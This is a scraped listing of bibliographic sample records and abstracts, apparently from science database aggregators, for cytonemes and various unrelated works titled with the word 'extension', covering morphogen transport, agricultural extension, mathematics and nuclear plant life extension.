#### Sample records for tubulovesicular extensions cytonemes 1. Bidirectional transport model of morphogen gradient formation via cytonemes Science.gov (United States) Bressloff, Paul C.; Kim, Hyunjoong 2018-03-01 Morphogen protein gradients play an important role in the spatial regulation of patterning during embryonic development. The most commonly accepted mechanism for gradient formation is diffusion from a source combined with degradation. Recently, there has been growing interest in an alternative mechanism, which is based on the direct delivery of morphogens along thin, actin-rich cellular extensions known as cytonemes. In this paper, we develop a bidirectional motor transport model for the flux of morphogens along cytonemes, linking a source cell to a one-dimensional array of target cells. By solving the steady-state transport equations, we show how a morphogen gradient can be established, and explore how the mean velocity of the motors affects properties of the morphogen gradient such as accumulation time and robustness. In particular, our analysis suggests that in order to achieve robustness with respect to changes in the rate of synthesis of morphogen, the mean velocity has to be negative, that is, retrograde flow or treadmilling dominates. Thus the potential targeting precision of cytonemes comes at an energy cost. We then study the effects of non-uniformly allocating morphogens to the various cytonemes projecting from a source cell. This competition for resources provides a potential regulatory control mechanism not available in diffusion-based models. 2. Cytonemes as specialized signaling filopodia OpenAIRE Kornberg, Thomas B.; Roy, Sougata 2014-01-01 Development creates a vast array of forms and patterns with elegant economy, using a small vocabulary of pattern-generating proteins such as BMPs, FGFs and Hh in similar ways in many different contexts. Despite much theoretical and experimental work, the signaling mechanisms that disperse these morphogen signaling proteins remain controversial. Here, we review the conceptual background and evidence that establishes a fundamental and essential role for cytonemes as specialized filopodia that t... 3. Mold Alkaloid Cytochalasin D Modifies the Morphology and Secretion of fMLP-, LPS-, or PMA-Stimulated Neutrophils upon Adhesion to Fibronectin Directory of Open Access Journals (Sweden) Svetlana I. Galkina 2017-01-01 Full Text Available Neutrophils play an essential role in innate immunity due to their ability to migrate into infected tissues and kill microbes with bactericides located in their secretory granules. Neutrophil transmigration and degranulation are tightly regulated by actin cytoskeleton. Invading pathogens produce alkaloids that cause the depolymerization of actin, such as the mold alkaloid cytochalasin D. We studied the effect of cytochalasin D on the morphology and secretion of fMLP-, LPS-, or PMA-stimulated human neutrophils upon adhesion to fibronectin. Electron microscopy showed that the morphology of the neutrophils adherent to fibronectin in the presence of various stimuli differed. But in the presence of cytochalasin D, all stimulated neutrophils exhibited a uniform nonspread shape and developed thread-like membrane tubulovesicular extensions (cytonemes measuring 200 nm in diameter. Simultaneous detection of neutrophil secretory products by mass spectrometry showed that all tested stimuli caused the secretion of MMP-9, a key enzyme in the neutrophil migration. Cytochalasin D impaired the MMP-9 secretion but initiated the release of cathepsin G and other granular bactericides, proinflammatory agents. The release of bactericides apparently occurs through the formation, shedding, and lysis of cytonemes. The production of alkaloids which modify neutrophil responses to stimulation via actin depolymerization may be part of the strategy of pathogen invasion. 4. Sociologists in Extension Science.gov (United States) Christenson, James A.; And Others 1977-01-01 The article describes the work activities of the extension sociologist, the relative advantage and disadvantage of extension roles in relation to teaching/research roles, and the relevance of sociological training and research for extension work. (NQ) 5. Pseudo Algebraically Closed Extensions Science.gov (United States) Bary-Soroker, Lior 2009-07-01 This PhD deals with the notion of pseudo algebraically closed (PAC) extensions of fields. It develops a group-theoretic machinery, based on a generalization of embedding problems, to study these extensions. Perhaps the main result is that although there are many PAC extensions, the Galois closure of a proper PAC extension is separably closed. The dissertation also contains the following subjects. The group theoretical counterpart of pseudo algebraically closed extensions, the so-called projective pairs. Applications to seemingly unrelated subjects, e.g., an analog of Dirichlet's theorem about primes in arithmetic progression for polynomial rings in one variable over infinite fields. 6. Less extensive surgery compared to extensive surgery DEFF Research Database (Denmark) Lauszus, Finn F; Petersen, Astrid Christine; Neumann, Gudrun 2014-01-01 in postmenopausal women was associated with surgery including hysterectomy and bilateral oophorectomy (pcarcinoma was found 138 times (95% CI: 48, 275) more prevalent than the expected rate. CONCLUSION......: The survival of women was better in AGCT than in epithelial ovarian tumor. Age and type of surgery, besides stage, influenced survival. Total abdominal hysterectomy and bilateral salpingo-oophorectomy is the recommended treatment with advancing age. At younger age less extensive surgery was associated... 7. Marketing Extension Needs for Sustainable Extension Practices ... African Journals Online (AJOL) However, Age (ƒÓ2 =39.33;ƒâ>0.05), religion (ƒÓ2 =2.752; ƒâ >0.05) and cassava association membership (ƒÓ2= 3.438, ƒâ>0.05) were not significant. Therefore, agricultural marketing techniques should be incorporated into agricultural extension delivery packages to ensure continuous farming practices and adoption of ... 8. Priorities for Extension. Science.gov (United States) Hayward, J. A. Agricultural extension is one component in an array including research, training, education, marketing, international trade, etc. which develop together to bring about growth, and sustained growth determines the priorities for extension. These priorities depend inevitably on the stage of development of a country or region, and on the current… 9. Type extension trees DEFF Research Database (Denmark) Jaeger, Manfred 2006-01-01 We introduce type extension trees as a formal representation language for complex combinatorial features of relational data. Based on a very simple syntax this language provides a unified framework for expressing features as diverse as embedded subgraphs on the one hand, and marginal counts...... of attribute values on the other. We show by various examples how many existing relational data mining techniques can be expressed as the problem of constructing a type extension tree and a discriminant function.... 10. Spacetime extensions Pt. 1 International Nuclear Information System (INIS) Racz, I. 1991-09-01 The problem of the existence of local extensions of spacetime is considered. It is shown that for a spacetime including an incomplete inextendible non-coiling causal geodesic curve there exists a particular C k (resp. C k- ) local extension provided that the curvature and its covariant derivatives are well behaved up to order k + 1 (resp. k) along a family of causal geodetics (around the chosen one). (R.P.) 15 refs 11. Android Access Control Extension Directory of Open Access Journals (Sweden) Anton Baláž 2015-12-01 Full Text Available The main objective of this work is to analyze and extend security model of mobile devices running on Android OS. Provided security extension is a Linux kernel security module that allows the system administrator to restrict program's capabilities with per-program profiles. Profiles can allow capabilities like network access, raw socket access, and the permission to read, write, or execute files on matching paths. Module supplements the traditional Android capability access control model by providing mandatory access control (MAC based on path. This extension increases security of access to system objects in a device and allows creating security sandboxes per application. 12. Homomorphisms between C∗ -algebra extensions C∗. -algebra extensions, Ext groups do not classify extension algebras. So one has to study the isomorphism equivalence of extensions. In fact, a homomorphism between two extension algebras may not map the essential ideal into the other in general, so we have to consider properties of extension homomorphisms. 13. Mobile Applications for Extension Science.gov (United States) Drill, Sabrina L. 2012-01-01 Mobile computing devices (smart phones, tablets, etc.) are rapidly becoming the dominant means of communication worldwide and are increasingly being used for scientific investigation. This technology can further our Extension mission by increasing our power for data collection, information dissemination, and informed decision-making. Mobile… 14. Extensions of tempered representations NARCIS (Netherlands) Opdam, E.; Solleveld, M. 2013-01-01 Let π, π′ be irreducible tempered representations of an affine Hecke algebra H with positive parameters. We compute the higher extension groups Ext nH(π,π′) explicitly in terms of the representations of analytic R-groups corresponding to π and π′. The result has immediate applications to the 15. Journal of Agricultural Extension African Journals Online (AJOL) Mission Statement The mission of the "Journal of Agricultural Extension" is to publish conceptual papers and empirical research that tests, extends, or builds ... Symbol recognition and interpretation of HIV/AIDS pictorial messages among rural women in Abia State Nigeria · EMAIL FREE FULL TEXT EMAIL FREE FULL TEXT 16. Dimension and extensions CERN Document Server Aarts, JM 1993-01-01 Two types of seemingly unrelated extension problems are discussed in this book. Their common focus is a long-standing problem of Johannes de Groot, the main conjecture of which was recently resolved. As is true of many important conjectures, a wide range of mathematical investigations had developed, which have been grouped into the two extension problems. The first concerns the extending of spaces, the second concerns extending the theory of dimension by replacing the empty space with other spaces. The problem of de Groot concerned compactifications of spaces by means of an adjunction of a set of minimal dimension. This minimal dimension was called the compactness deficiency of a space. Early success in 1942 lead de Groot to invent a generalization of the dimension function, called the compactness degree of a space, with the hope that this function would internally characterize the compactness deficiency which is a topological invariant of a space that is externally defined by means of compact extensions of a... 17. Extensive air showers CERN Document Server Rao, M V S 1997-01-01 Ultrahigh energy cosmic rays carry information about their sources and the intervening medium apart from providing a beam of particles for studying certain features of high energy interactions currently inaccessible at man-made accelerators. They can at present be studied only via the extensive air showers (EAS's) they generate while passing through the Earth's atmosphere, since their fluxes are too low for the experiments of limited capability flown in balloons and satellites. The EAS is generated by a series of interactions of the primary cosmic ray and its progeny with the atmospheric nucle Directory of Open Access Journals (Sweden) George M Jacobs 2014-05-01 Full Text Available This article offers guidance to teachers and students in selecting materials for extensive reading (ER. First, the article explains characteristics of ER and reviews some of the potential gains for students who do ER. Second, the article considers criteria for teachers to bear in mind when selecting ER materials. Third, the article then suggests ways that teachers and students can find ER materials. Fourth, guidance is provided to students for when they select what to read from among the ER materials available to them. Finally, advice is given on integrating ER with course textbooks. 19. Continuous multivariate exponential extension International Nuclear Information System (INIS) Block, H.W. 1975-01-01 The Freund-Weinman multivariate exponential extension is generalized to the case of nonidentically distributed marginal distributions. A fatal shock model is given for the resulting distribution. Results in the bivariate case and the concept of constant multivariate hazard rate lead to a continuous distribution related to the multivariate exponential distribution (MVE) of Marshall and Olkin. This distribution is shown to be a special case of the extended Freund-Weinman distribution. A generalization of the bivariate model of Proschan and Sullo leads to a distribution which contains both the extended Freund-Weinman distribution and the MVE 20. Extensions of string theories Energy Technology Data Exchange (ETDEWEB) Amorim, R.; Barcelos-Neto, J. (Universidade Federal do Rio de Janeiro, RJ (Brazil). Inst. de Fisica) 1993-06-01 With the motivation that critical dimensions D[ne]4 might be suggeting that string theories have not been completely formulated, we study more general alternatives. We first consider a direct extension in the world-sheet formulation with N[sub B] bosons and N[sub F] fermions and analyze the conditions for canceling the anomaly in all possible combinations of N[sub B], N[sub F] and D. Later on we incorporate degrees of freedom of antisymmetric tensors to the previous model. The only possibility to cancel the anomaly in this case is with N[sub B]=N[sub F]=1 and the our everyday spacetime dimension D=4. (orig.). 1. Ground System Extensibility Considerations Science.gov (United States) Miller, S. W.; Greene, E. 2017-12-01 The National Oceanic and Atmospheric Administration (NOAA) and National Aeronautics and Space Administration (NASA) are jointly acquiring the next-generation civilian weather and environmental satellite system: the Joint Polar Satellite System (JPSS). The Joint Polar Satellite System will replace the afternoon orbit component and ground processing system of the current Polar-orbiting Operational Environmental Satellites (POES) managed by NOAA. The JPSS satellites will carry a suite of sensors designed to collect meteorological, oceanographic, climatological and geophysical observations of the Earth. The ground processing system for JPSS is known as the JPSS Common Ground System (JPSS CGS). Developed and maintained by Raytheon Intelligence, Information and Services (IIS), the CGS is a multi-mission enterprise system serving NOAA, NASA and their national and international partners, such as NASA's Earth Observation System (EOS), NOAA's current POES, the Japan Aerospace Exploration Agency's (JAXA) Global Change Observation Mission - Water (GCOM-W1), and DoD's Defense Meteorological Satellite Program (DMSP). The CGS provides a wide range of support to a number of national and international missions, including command and control, mission management, data acquisition and routing, and environmental data processing and distribution. The current suite of CGS-supported missions has demonstrated the value of interagency and international partnerships to address global observation needs. With its established infrastructure and existing suite of missions, the CGS is extensible to a wider array of potential new missions. This paper will describe how the inherent scalability and extensibility of the CGS enables the addition of these new missions, with an eye on global enterprise needs in the 2020's and beyond. 2. Attitude Of Extension Personnel To Training And Visit Extension ... African Journals Online (AJOL) In order to make the attitudes of extension workers more affirmative, the paper recommended, inter alia, staff motivation, minimizing political and administrative interference in staff work and a reasonable reduction in the work load of extension staff. Key words: attitude, extension personnel, training and visit. Journal of ... 3. test with extensions Directory of Open Access Journals (Sweden) J. C. W. Rayner 1997-01-01 Full Text Available The data for the tests considered here may be presented in two-way contingency tables with all marginal totals fixed. We show that Pearson's test statistic XP2 (P for Pearson may be partitioned into useful and informative components. The first detects location differences be tween the treatments, and the subsequent components detect dispersion and higher order moment differences. For Kruskal-Wallis-type data when there are no ties, the location component is the Kruskal-Wallis test. The subsequent components are the extensions. Our approach enables us to generalise to when there are ties, and to when there is a fixed number of categories and a large number of observations. We also propose a generalisation of the well-known median test. In this situation the location-detecting first component of XP2 reduces to the usual median test statistic when there are only two categories. Subsequent components detect higher moment departures from the null hypothesis of equal treatment effects 4. Web Extensible Display Manager Energy Technology Data Exchange (ETDEWEB) Slominski, Ryan [Thomas Jefferson National Accelerator Facility (TJNAF), Newport News, VA (United States); Larrieu, Theodore L. [Thomas Jefferson National Accelerator Facility (TJNAF), Newport News, VA (United States) 2018-02-01 Jefferson Lab's Web Extensible Display Manager (WEDM) allows staff to access EDM control system screens from a web browser in remote offices and from mobile devices. Native browser technologies are leveraged to avoid installing and managing software on remote clients such as browser plugins, tunnel applications, or an EDM environment. Since standard network ports are used firewall exceptions are minimized. To avoid security concerns from remote users modifying a control system, WEDM exposes read-only access and basic web authentication can be used to further restrict access. Updates of monitored EPICS channels are delivered via a Web Socket using a web gateway. The software translates EDM description files (denoted with the edl suffix) to HTML with Scalable Vector Graphics (SVG) following the EDM's edl file vector drawing rules to create faithful screen renderings. The WEDM server parses edl files and creates the HTML equivalent in real-time allowing existing screens to work without modification. Alternatively, the familiar drag and drop EDM screen creation tool can be used to create optimized screens sized specifically for smart phones and then rendered by WEDM. 5. Extensions panach\\'ees autoduales OpenAIRE Bertrand, Daniel 2010-01-01 We study self-duality of Grothendieck's blended extensions (extensions panach\\'ees) in the context of a tannakian category. The set of equivalence classes of symmetric, resp. antisymmetric, blended extensions is naturally endowed with a torsor structure, which enables us to compute the unipotent radical of the associated monodromy groups in various situations 6. Robotic hand with modular extensions Science.gov (United States) Salisbury, Curt Michael; Quigley, Morgan 2015-01-20 A robotic device is described herein. The robotic device includes a frame that comprises a plurality of receiving regions that are configured to receive a respective plurality of modular robotic extensions. The modular robotic extensions are removably attachable to the frame at the respective receiving regions by way of respective mechanical fuses. Each mechanical fuse is configured to trip when a respective modular robotic extension experiences a predefined load condition, such that the respective modular robotic extension detaches from the frame when the load condition is met. 7. Think - Baltic Extension / Kalle Kask Index Scriptorium Estoniae 2002-01-01 Tallinna TÜ Rehabilitatsiooni tehnoloogia keskus korraldas pressikonverentsi, kus tutvustati osalemist EL V raamprogrammis Think - Baltic Extension, mis on suunatud puuetega inimeste tööhõive tagamisele 8. EXTENSION WORKERS' OPINIONS REGARDING THE ... African Journals Online (AJOL) The primary purpose of the study was to determine extension worker's opinions regarding the influence of the National Maize Competition (NAMCOM) on the farmers' agricultural practices and experiences in the Manzini region. A census population of front-line extension workers in charge of the participating areas in ... 9. Journal of Agricultural Extension: Submissions African Journals Online (AJOL) Publication Ethics Articles published in the Journal of Agricultural Extension must be relevant to extension practice and should not have been published or under ... COI involves using your position as an author, editor, or reviewer to promote your interests (business or financial), or those of your external relationships (family ... 10. Quotient semigroups and extension semigroups the viewpoint of C∗-algebra and apply them to a survey of extension semigroups. Cer- tain interrelations ... -algebra extension theory and K K-theory, it is crucial to study the theory of quotient semigroups from the ... Similar to the construction of quotient group and quotient linear space, quotient semi- group may be induced ... 11. Repeat Customer Success in Extension Science.gov (United States) Bess, Melissa M.; Traub, Sarah M. 2013-01-01 Four multi-session research-based programs were offered by two Extension specialist in one rural Missouri county. Eleven participants who came to multiple Extension programs could be called "repeat customers." Based on the total number of participants for all four programs, 25% could be deemed as repeat customers. Repeat customers had… 12. Hom-associative Ore extensions Science.gov (United States) Bäck, P.; Richter, J.; Silvestrov, S. 2018-02-01 We introduce hom-associative Ore extensions as non-associative, non-unital Ore extensions with a hom-associative multiplication, as well as give some necessary and sufficient conditions when such exist. Within this framework, we also construct a family of hom-associative Weyl algebras as generalizations of the classical analogue, and prove that they are simple. African Journals Online (AJOL) i Training extension staff and farmers . ..ii Producing fry for satellite centres at the regions and for fish fanners; and iii Conducting experiments on fish production, productivity and water quality. Restructuring of Agricultural Research and Extension services. The organisation ofUganda's national agricultural research. 14. Frames and extension problems I DEFF Research Database (Denmark) Christensen, Ole 2014-01-01 In this article we present a short survey of frame theory in Hilbert spaces. We discuss Gabor frames and wavelet frames and set the stage for a discussion of various extension principles; this will be presented in the article Frames and extension problems II (joint with H.O. Kim and R.Y. Kim).... 15. Extension and the Practicing Veterinarian Science.gov (United States) Meyerholz, G. W. 1974-01-01 In order for Extension programs of veterinary medicine to succeed, good relationships are needed among university veterinarians, practicing local veterinarians, county Extension agents and the clientele. This author attempts to define some roles and relationships and offer some suggestions for the improvement of relationships to increase… 16. Programming Reactive Extensions and LINQ CERN Document Server Liberty, Jesse 2011-01-01 Pro Reactive Extensions and LINQ is a deep dive into the next important technology for .NET developers: Reactive Extensions. This in-depth tutorial goes beyond what is available anywhere else to teach how to write WPF, Silverlight, and Windows Phone applications using the Reactive Extensions (Rx) to handle events and asynchronous method calls. Reactive programming allows you to turn those aspects of your code that are currently imperative into something much more event-driven and flexible. For this reason, it's sometimes referred to as LINQ for Events. Reactive programming hinges on the concep 17. Learning Joomla! 3 extension development CERN Document Server Plummer, Tim 2013-01-01 A practical guide with step-by-step examples that build on each other so you can learn by doing and get hands-on knowledge about creating your plugins, modules, and components in Joomla.""Learning Joomla! 3 Extension Development, Third Edition"" is for developers who want to create their own Joomla extensions. It is assumed you will have some basic PHP, HTML, and CSS knowledge, but you don't need any prior Joomla programming experience. This book will also be useful to people who just want to make minor customizations to existing Joomla extensions and build on the work of others in the open so 18. Extensions of the Standard Model CERN Document Server Zwirner, Fabio 1996-01-01 Rapporteur talk at the International Europhysics Conference on High Energy Physics, Brussels (Belgium), July 27-August 2, 1995. This talk begins with a brief general introduction to the extensions of the Standard Model, reviewing the ideology of effective field theories and its practical implications. The central part deals with candidate extensions near the Fermi scale, focusing on some phenomenological aspects of the Minimal Supersymmetric Standard Model. The final part discusses some possible low-energy implications of further extensions near the Planck scale, namely superstring theories. 19. BWR operation for life extension International Nuclear Information System (INIS) Stancavage, P. 1987-01-01 Most nuclear power plant life extension studies conducted to date focus on the technology, licensing, and economics of extended service life. The most significant factor in plant longevity, however, is proper operation and maintenance. This paper highlights the benefits of boiling water reactor (BWR) operation for life extension and discusses specific recommendations that will enhance the prospects for safe, reliable, and economic power production in the long term. The benefits of BWR operation for life extension include a lower cost of electric energy production, increased capacity and availability factors, a lower forced outage rate, and reduced occupational exposure to radiation. Operating experience and advanced in technology have provided a wealth of knowledge that can be used to develop specific recommendations for adding years to the expected life of BWR plants. This paper discusses key factors in operation for life extension 20. Extension agents and conflict narratives DEFF Research Database (Denmark) Bond, Jennifer Lauren 2016-01-01 conflict. Originality: This work contributes to a growing body of literature interested in the role of extension agents in conflict management. By applying Q methodology, this work has shown that while extension agents are involved in conflict management, their perceptions of these conflicts are subjective......Purpose: This work investigated the narratives of development extensionists in relation to natural resource conflict, in order to understand the competing discourses surrounding the wicked problems of natural resource management in Laikipia County, Kenya. Methodology: Q methodology was used...... to elicit the conflict narratives present among extension professionals. A concourse of 221 statements were devised from interviews and group discussions with key informants and a final sample of 49 statements was used for the sorting. Thirteen Q-sorts were undertaken with among rural extension... 1. Boiler-turbine life extension Energy Technology Data Exchange (ETDEWEB) Natzkov, S. [TOTEMA, Ltd., Sofia (Bulgaria); Nikolov, M. [CERB, Sofia (Bulgaria) 1995-12-01 The design life of the main power equipment-boilers and turbines is about 105 working hours. The possibilities for life extension are after normatively regulated control tests. The diagnostics and methodology for Boilers and Turbines Elements Remaining Life Assessment using up to date computer programs, destructive and nondestructive control of metal of key elements of units equipment, metal creep and low cycle fatigue calculations. As well as data for most common damages and some technical decisions for elements life extension are presented. 2. Agricultural extension and mass media. Science.gov (United States) Perraton, H 1983-12-01 To learn more about the use of the mass media for agricultural extension, the World Bank has considered the efforts of 2 units: INADES-formation in West Africa and the Extension Aids Branch of Malawi. The INADES-formation study focuses on Cameroon but also considers work in Rwanda and the Ivory Coast. Some general conclusions emerge from a comparison of the 2 organizations. Malawi operates an extension service which reaches farmers through extension agents, through farmer training centers, and through mass media. The Extension Aids Branch (EAB) has responsibility for its media work and broadcasts 4 1/2 hours of radio each week. Its 6 regular radio programs include a general program which interviews farmers, a music request program in which the music is interspersed with farming advice, a farming family serial, and a daily broadcast of agricultural news and information. The 17 cinema vans show some agricultural films, made by EAB, some entertainment films, and some government information films from departments other than the ministry of agriculture. EAB also has a well-developed program of research and evaluation of its own work. INADES-formation, the training section of INADES, works towards social and economic development of the population. It teaches peasant farmers and extension agents and does this through running face-to-face seminars, by publishing a magazine, "Agripromo," and through correspondence courses. In 1978-79 INADES-formation enrolled some 4500 farmers and extension agents as students. Both of these organizations work to teach farmers better agriculture techniques, and both were created in response to the fact that agricultural extension agents cannot meet all the farmers in their area. Despite the similarity of objective, there are differences in methods and philosophy. The EAB works in a single country and uses a variety of mass media, with print playing a minor role. INADES-formation is an international and nongovernmental organization and its 3. Extension Agents\\' Commitment To Extension Work In Abia And ... African Journals Online (AJOL) A structured and validated inventory scale titled: “Job Commitment Inventory Scale” was administered to 89 and 61 respondents randomly selected from a population of 112 and 117 extension agents in Abia and Rivers States ADPs. respectively. The data collected were analyzed using descriptive statistical tools such as ... 4. verbal extensions: valency decreasing extensions in the basà ... African Journals Online (AJOL) Finance London: Hodder. Education. Imoh, P.M., 2013. Verbal extensions: Valency increasing operations in Basà verbal system. Paper presented at the West African Languages Congress (WALC) and 26th Annual. Conference of the Linguistic Association of Nigeria (26th CLAN), 29th July to 2nd August. 2013, University of Ibadan, ... 5. NDE and plant life extension International Nuclear Information System (INIS) Liu, S.N.; Ammirato, F.V.; Nottingham, L.D. 1991-01-01 Component life extension is the process of making run-repair-replace decisions for plant components and includes a thorough analysis of the capability of the component to perform throughout the projected lifetime. For many critical plant components, nondestructive evaluation (NDE) is essential in determining whether the component can be operated safely and economically in the extended life period and to help utilities determine safe and economic inspection intervals. NDE technology is required for not only detecting defects that could grow to a size of concern during extended lifetimes, but also will be called upon to measure and monitor accumulating material degradation that strongly affects component reliability. This paper discusses the role of NDE in life extension by reviewing three examples--a reactor pressure vessel, steam turbine-generator rotors, and generator retaining rings. In each example, the contribution of NDE to life extension decisions is described. (author) 6. Extension properties of states on operator algebras Science.gov (United States) Hamhalter, Jan 1995-08-01 We summarize and deepen some recent results concerning the extension problem for states on operator algebras and general quantum logics. In particular, we establish equivalence between the Gleason extension property, the Hahn-Banach extension property, and the universal state extension property of projection logics. Extensions of Jauch-Piron states are investigated. 7. Extension Resources for International Trade Science.gov (United States) Seal, Susan D. 2016-01-01 With the opening of additional trade partnerships, the reduction of global transportation and communication costs, and the increase in demand for U.S. agricultural products and services, international trade is an area of great importance to more and more Extension clients and stakeholders. This article provides information about the primary… 8. Invertible extensions and growth conditions Czech Academy of Sciences Publication Activity Database 2004-01-01 Roč. 339, - (2004), s. 21-26 ISSN 1631-073X R&D Projects: GA ČR GA201/03/0041; GA AV ČR KSK1019101 Institutional research plan: CEZ:AV0Z1019905 Keywords : invertible extensions * growth conditions Subject RIV: BA - General Mathematics Impact factor: 0.284, year: 2004 9. African Journal of Livestock Extension African Journals Online (AJOL) African Journal of Livestock Extension aims to bring to the fore the role and significance of livestock in maintaining rural, peri-urban and urban households, vis-à-vis its impact on poverty alleviation, household nutritional status, economic coping strategy and provision of employment. The focus of the journal relates to all ... 10. Managing Diversity within Cooperative Extension. Science.gov (United States) Ewert, D. Merrill; Rice, Jennifer A. King 1994-01-01 Six focus groups analyzed findings of a literature review on cultural diversity's effects on productivity and effectiveness. Action steps for Cooperative Extension were outlined: implementing affirmative action, valuing diversity, managing diversity, creating new management structures, and establishing a more supportive environment. (SK) 11. intensive and extensive feeding regimes African Journals Online (AJOL) production and reproduction parameters in ram lambs, under intensive and extensive feeding regimes. J.P.C. Greyling* and G.J. Taylor. Department of Animal Science, University of the Orange Free State, PO. Box 339, Bloemfontein,. 9300, South Africa. Received revised 1 July 1999; accepted 28 July 1999. Forty Dorper ... 12. Extensions of the standard model International Nuclear Information System (INIS) Ramond, P. 1983-01-01 In these lectures we focus on several issues that arise in theoretical extensions of the standard model. First we describe the kinds of fermions that can be added to the standard model without affecting known phenomenology. We focus in particular on three types: the vector-like completion of the existing fermions as would be predicted by a Kaluza-Klein type theory, which we find cannot be realistically achieved without some chiral symmetry; fermions which are vector-like by themselves, such as do appear in supersymmetric extensions, and finally anomaly-free chiral sets of fermions. We note that a chiral symmetry, such as the Peccei-Quinn symmetry can be used to produce a vector-like theory which, at scales less than M/sub W/, appears to be chiral. Next, we turn to the analysis of the second hierarchy problem which arises in Grand Unified extensions of the standard model, and plays a crucial role in proton decay of supersymmetric extensions. We review the known mechanisms for avoiding this problem and present a new one which seems to lead to the (family) triplication of the gauge group. Finally, this being a summer school, we present a list of homework problems. 44 references 13. Extensiveness of Farmers' Buying Process NARCIS (Netherlands) Kool, M.; Meulenberg, M.T.G.; Broens, D.F. 1997-01-01 In this article we study farmers' buying processes, in particular the selection of a supplier for a given farm input. Extensiveness of farmers' buying processes is defined as the degree information acquisition and alternative evaluation effort carried out to prepare that selection. Hypotheses, 14. Journal of Agricultural Extension submitted to Agricultural Extension ... African Journals Online (AJOL) followed by lack of contact with extension agents (71.7%) and gender discrimination in obtaining land on lease for farming (39.2). Majority (65.8%) of .... The study area was Osun State, a tropical state in South west; Nigeria lying within coordinates 7. 0. 30ʹN and 4. 030ʹE. The state comprised of 30 Local Government ... 15. Linear programming foundations and extensions CERN Document Server Vanderbei, Robert J 2001-01-01 Linear Programming: Foundations and Extensions is an introduction to the field of optimization. The book emphasizes constrained optimization, beginning with a substantial treatment of linear programming, and proceeding to convex analysis, network flows, integer programming, quadratic programming, and convex optimization. The book is carefully written. Specific examples and concrete algorithms precede more abstract topics. Topics are clearly developed with a large number of numerical examples worked out in detail. Moreover, Linear Programming: Foundations and Extensions underscores the purpose of optimization: to solve practical problems on a computer. Accordingly, the book is coordinated with free efficient C programs that implement the major algorithms studied: -The two-phase simplex method; -The primal-dual simplex method; -The path-following interior-point method; -The homogeneous self-dual methods. In addition, there are online JAVA applets that illustrate various pivot rules and variants of the simplex m... 16. Managing BWR plant life extension International Nuclear Information System (INIS) Ianni, P.W.; Kiss, E. 1985-01-01 Recent studies have confirmed that extending the useful life of a large nuclear plant can be justified with very high cost benefit ratio. In turn, experience with large power plant systems and equipment has shown that a well-integrated and -managed plan is essential in order to achieve potential economic benefits. Consequently, General Electric's efforts have been directed at establishing a life extension plan that considers alternative options and cost-effective steps that can be taken in early life, those appropriate during middle life, and those required in late life. This paper briefly describes an approach designed to provide the plant owner a maximum of flexibility in developing a life extension plan 17. Extensive Reading and Learning Style OpenAIRE Kawachi, Tomoko; 河内, 智子 2015-01-01 Extensive reading (ER) has been shown to be an effective approach to both improving students’ language skills and nurturing positive attitudes toward language reading and learning. However, although the approach has proven to be effective for many learners, as with any teaching approach, it does not seem to work equally well for all learners. The current study hypothesized that learning style might be a factor influencing learners’ achievement in and attitude toward ER, and investigated the r... 18. Rosacea with extensive extrafacial lesions OpenAIRE Pereira, TM; Vieira, AP; Sousa-Basto, A 2008-01-01 Rosacea is a very common skin disorder in the clinical practice that primarily affects the convex areas of the face. Extrafacial rosacea lesions have occasionally been described, but extensive involvement is exceptional. In the absence of its typical clinical or histological features, the diagnosis of extrafacial rosacea may be problematic. We describe an unusual case of rosacea with very exuberant extrafacial lesions, when compared with the limited involvement of the face. 19. Recall in extensive form games OpenAIRE Klaus Ritzberger 1999-01-01 This paper considers characterizations of perfect recall in extensive form games. It is shown that perfect recall can be expressed in terms of choices without any reference to infomation sets. When information sets are taken into account, it is decomposable into an ordering of information sets and that players do not forget what they knew nor what they did. Thus, if information sets are partially ordered, then perfect recall is implied by the player's inability to refine her information from ... 20. Journal of Agricultural Extension: Editorial Policies African Journals Online (AJOL) Mission Statement: The mission of the Journal of Agricultural Extension is to publish conceptual papers and empirical research that tests, extends, or builds ... research and methodological issues; nutrition extension; extension youth programme; women-in-agriculture; extension, Climate Change and the environment, ICT, ... 1. Professional development and extension programs International Nuclear Information System (INIS) Bereznai, G. 2015-01-01 Professional Development (PD) refers to the means by which people acquire, develop, maintain and enhance the specialist knowledge and skills needed to practice in their profession. Extension Programs (aka Continuing Education) are offered by most post-secondary degree/diploma/certificate granting institutions.The courses are typically taken on a part-time basis, and course delivery often includes distance learning technology. An important implementation of PD is via workplace training, industry specific seminars, workshops and non-credit courses offered by a wide range of service providers. 2. Coal Combustion Products Extension Program Energy Technology Data Exchange (ETDEWEB) Tarunjit S. Butalia; William E. Wolfe 2006-01-11 This final project report presents the activities and accomplishments of the ''Coal Combustion Products Extension Program'' conducted at The Ohio State University from August 1, 2000 to June 30, 2005 to advance the beneficial uses of coal combustion products (CCPs) in highway and construction, mine reclamation, agricultural, and manufacturing sectors. The objective of this technology transfer/research program at The Ohio State University was to promote the increased use of Ohio CCPs (fly ash, FGD material, bottom ash, and boiler slag) in applications that are technically sound, environmentally benign, and commercially competitive. The project objective was accomplished by housing the CCP Extension Program within The Ohio State University College of Engineering with support from the university Extension Service and The Ohio State University Research Foundation. Dr. Tarunjit S. Butalia, an internationally reputed CCP expert and registered professional engineer, was the program coordinator. The program coordinator acted as liaison among CCP stakeholders in the state, produced information sheets, provided expertise in the field to those who desired it, sponsored and co-sponsored seminars, meetings, and speaking at these events, and generally worked to promote knowledge about the productive and proper application of CCPs as useful raw materials. The major accomplishments of the program were: (1) Increase in FGD material utilization rate from 8% in 1997 to more than 20% in 2005, and an increase in overall CCP utilization rate of 21% in 1997 to just under 30% in 2005 for the State of Ohio. (2) Recognition as a ''voice of trust'' among Ohio and national CCP stakeholders (particularly regulatory agencies). (3) Establishment of a national and international reputation, especially for the use of FGD materials and fly ash in construction applications. It is recommended that to increase Ohio's CCP utilization rate from 30% in 2005 to 3. JESS: Java extensible snakes system Science.gov (United States) McInerney, Tim; Akhavan Sharif, M. Reza; Pashotanizadeh, Nasrin 2005-04-01 Snakes (Active Contour Models) are powerful model-based image segmentation tools. Although researchers have proven them especially useful in medical image analysis over the past decade, Snakes have remained primarily in the academic world and they have not become widely used in clinical practice or widely available in commercial packages. A number of confusing and specialized variants exist and there has been no standard open-source implementation available. To address this problem, we present a Java Extensible Snakes System (JESS) that is general, portable, and extensible. The system uses Java Swing classes to allow for the rapid development of custom graphical user interfaces (GUI's). It also incorporates the Java Advanced Imaging(JAI) class library, which provide custom image preprocessing, image display and general image I/O. The Snakes algorithm itself is written in a hierarchical fashion, consisting of a general Snake class and several subclasses that span the main variants of Snakes including a new, powerful, robust subdivision-curve Snake. These subclasses can be easily and quickly extended and 